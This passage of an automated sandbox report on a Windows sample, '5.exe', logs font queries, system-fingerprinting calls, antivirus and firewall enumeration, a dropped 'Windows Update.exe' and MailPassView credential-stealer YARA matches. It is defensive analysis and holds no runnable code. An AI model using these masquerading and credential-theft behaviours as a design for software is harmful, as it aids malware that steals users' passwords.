          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_0040208D cpuid 2_2_0040208D
          Source: C:\Users\user\Desktop\5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00401B74
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_0040724C
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_0040594D
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: Windows Update.exe, 0000000A.00000002.383634625.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343433664.00000000007D4000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343320969.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351731371.00000000007D4000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351665012.0000000000768000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected MailPassViewShow sources
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4aedc72.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b7fa72.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4b3fa72.17.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE
